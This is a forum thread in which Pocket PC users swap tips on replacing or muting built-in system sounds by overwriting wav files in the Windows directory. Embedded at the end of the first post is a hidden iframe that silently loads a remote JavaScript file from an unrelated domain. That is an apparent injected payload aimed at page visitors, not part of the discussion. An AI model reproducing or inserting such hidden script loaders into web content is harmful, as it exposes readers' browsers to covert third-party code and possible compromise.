I was wondering if anyone knew a way to change the sounds that do not show up start | settings | sounds & notifications.
I would like to disable the noises the ppc makes when soft resetting so that I don't have to plug a headset in when I want to soft reset my ppc at work. I also would like to change the sounds it makes when connecting to express network, as well as the little default "meep! pop!" it makes when I click on the start menu and choose a program.
I can't replace or delete the default wav files in the \windows directory, so I guess they must be stored in rom.
Any ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
These are all in the windows directory. I think that's most of them, while it is true you cannot delete them because they are in rom, you can overwrite them. If you want them to not play at all just create an empty text file and name it the name of the wav..ie phoneon.wav. Then copy it over the existing file, if you want to revert back to the original just delete the file you copied over.
I changed the Phone startup to a pretty cool Star Trek sound: http://trek.starshine.org/downlink/sounds/Trek/BTNSEQ2.WAV
I wish the darned thing did not use the Alarm 3 sound for Phone turn off! I'd like to change that to something cool as well, but I don't want to alter the default Alarm 3 sound for other uses...
Hey, Matt - thanks - you made my day with that. Fantastic. I will turn my phone off just so I can turn it on and hear that wonderful ditty.

Does replacing files in rom have to be done through activesync? I am trying to do it in file explorer (i'm at work right now) and i keep getting "access is denied"
Yeah, evidently I tried it with FE and it did now work, however, I use Total Commander and it lets me do it. http://www.ghisler.com/pocketpc.htm
Resco probally lets you do it too.
I downloaded total commander and it let me replace the files in rom without any problems. Nice little free app; thanks for the tip.
Now my phone is spouting a buncha nifty sounds from xenosaga and chrono trigger. I'm a happy camper

Personally, I did it through ActiveSync, using the Explore option. Worked fine. The only file I changed was the PhoneOn.wav, so when I used the Star Trek sound, I renamed it to PhoneOn in a folder on my PC, then dragged it over to the opened Windows Directory folder of the i700, and said Yes to overwriting the file. (I first copied the original over to another folder for safe keeping...)
ok, so maybe i'm just doing something silly or maybe it's cause my pc is running Vista but I can't find the sound file phoneon.wav anywhere on my Pn-820 i'm desperately trying to modify this phone to my liking and i really want to change the start-up sound. I found all the sound files for the number keys for my phone and am starting to change them but that startup sound is still not showing up anywhere. I have my computer set to show all files of all types. Also Total Commander doesn't work on my phone for some reason it says that it is not compatible although i have downloaded all the files they offer. If anyone could help me out with this i would be grateful thanks.
P.S. you can email me if you want
update:found it under a different file name opening_sound.wav but still won't let me change it through my phone or through the pc i have vista which doesn't have activesync so does anyone know what i gotta do to get this done?
